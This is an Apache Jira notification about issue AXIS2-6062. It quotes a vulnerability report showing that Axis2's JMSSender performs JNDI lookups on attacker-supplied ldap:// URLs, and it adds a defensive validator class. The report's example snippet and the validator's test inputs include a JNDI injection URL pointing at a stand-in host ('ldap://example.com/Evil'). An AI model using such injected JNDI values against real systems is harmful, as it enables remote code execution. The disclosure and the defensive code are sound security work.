[ https://issues.apache.org/jira/browse/AXIS2-6062?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=17925784#comment-17925784 ]

Robert Lazarski commented on AXIS2-6062:
----------------------------------------

Thanks for bringing this issue to our attention. I made the following commit, 
which passes our unit tests. 

https://github.com/apache/axis-axis2-java-core/commit/3b2aeee3712a2b3269fdbda38e4c2315f59c5027

I am marking this issue closed, which will go out soon with 2.0.0. 

> Is such a flexibility necessary allowing LDAP (and RMI, JRMP, etc.) protocol 
> in `JMSSender`?
> --------------------------------------------------------------------------------------------
>
>                 Key: AXIS2-6062
>                 URL: https://issues.apache.org/jira/browse/AXIS2-6062
>             Project: Axis2
>          Issue Type: Bug
>          Components: JMS transport
>    Affects Versions: 1.8.2
>            Reporter: Letian Yuan
>            Assignee: Robert Lazarski
>            Priority: Critical
>             Fix For: 2.0.0
>
>
> In "org.apache.axis2:axis2-transport-jms", there is a method, 
> `org.apache.axis2.transport.jms.JMSSender.invoke`, designed to send a 
> JMS message. However, if we send a JMS message like this:
>
>     MessageContext context = new MessageContext();
>     context.setProperty("TransportURL",
>         "jms://foobar?transport.jms.ConnectionFactoryJNDIName=ldap://example.com/Evil");
>     JMSSender sender = new JMSSender();
>     sender.invoke(context);
>
> Then, arbitrary commands from remote server "ldap://example.com/Evil" would 
> be executed.
> We want to discuss with you about it.
> First, executing arbitrary commands from remote server is quite dangerous. 
> Second, as far as we know, no one would use LDAP protocol to get 
> `ConnectionFactory`.
> Third, it seems this behavior has not been documented in your “User’s Guide”, 
> so library users might not know this API of sending JMS messages can be used 
> to execute arbitrary commands. So, I think that library users are quite 
> likely to misuse this API. For example, concatenating user input to the 
> parameter of `invoke`. Or, making the parameter of `invoke` 
> available in a configuration file such as `foobar.properties`. We 
> know that such cases rarely happen and might not be your design purpose, but 
> it is possible anyway. As long as an attacker can control the parameter of 
> `invoke`, remote code injection might happen.
> Therefore, we want to ask you whether it is your design purpose and whether 
> it is necessary for LDAP protocol (and RMI, JRMP, etc.).
> This is just our opinion, and we are willing to discuss it with you.
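As an added defender-side illustration (not the content of the Axis2 commit linked above, and not code from the reporter), the following validates the `transport.jms.ConnectionFactoryJNDIName` value taken from a `jms://` transport URL before it would reach a JNDI lookup; the class `JndiNameGuard` and its helpers `queryParams` and `isLocalJndiName` are hypothetical names chosen here.

```java
import java.net.URI;
import java.net.URISyntaxException;
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.HashMap;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
// Added illustration, not the code of the Axis2 commit referenced in this thread.
public final class JndiNameGuard {
    // Transport URL parameter named in the issue report.
    static final String CF_PARAM = "transport.jms.ConnectionFactoryJNDIName";
    // Matches a leading URL scheme such as "ldap:", "rmi:", "iiop:" or "java:".
    private static final Pattern SCHEME = Pattern.compile("^[A-Za-z][A-Za-z0-9+.-]*:");

    // Parses the query part of a jms://host?k=v&k2=v2 transport URL (hypothetical helper).
    static Map<String, String> queryParams(String transportUrl) throws URISyntaxException {
        Map<String, String> params = new HashMap<>();
        String query = new URI(transportUrl).getRawQuery();
        if (query == null) return params;
        for (String pair : query.split("&")) {
            int eq = pair.indexOf('=');
            String key = eq < 0 ? pair : pair.substring(0, eq);
            String value = eq < 0 ? "" : pair.substring(eq + 1);
            // Decode before checking, so the check sees the same string a lookup would.
            params.put(URLDecoder.decode(key, StandardCharsets.UTF_8),
                       URLDecoder.decode(value, StandardCharsets.UTF_8));
        }
        return params;
    }

    // Allow-list: plain names ("jms/ConnectionFactory") or the local "java:" namespace only.
    // Any other scheme (ldap:, rmi:, iiop:, dns:, ...) would direct the lookup to a remote server.
    static boolean isLocalJndiName(String name) {
        if (name == null || name.isEmpty()) return false;
        Matcher m = SCHEME.matcher(name);
        return !m.find() || m.group().equalsIgnoreCase("java:");
    }

    public static void main(String[] args) throws URISyntaxException {
        // Constructed inputs: the URL from the report and a benign counterpart.
        String[] urls = {
            "jms://foobar?" + CF_PARAM + "=ldap://example.com/Evil",
            "jms://foobar?" + CF_PARAM + "=jms/ConnectionFactory" };
        for (String url : urls) {
            String name = queryParams(url).get(CF_PARAM);
            System.out.println(name + " -> " + (isLocalJndiName(name) ? "lookup" : "rejected"));
        }
    }
}
```

The first URL is rejected and the second is allowed; the same check applies to any JNDI name that comes from configuration or request data rather than from code.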



--
This message was sent by Atlassian Jira
(v8.20.10#820010)
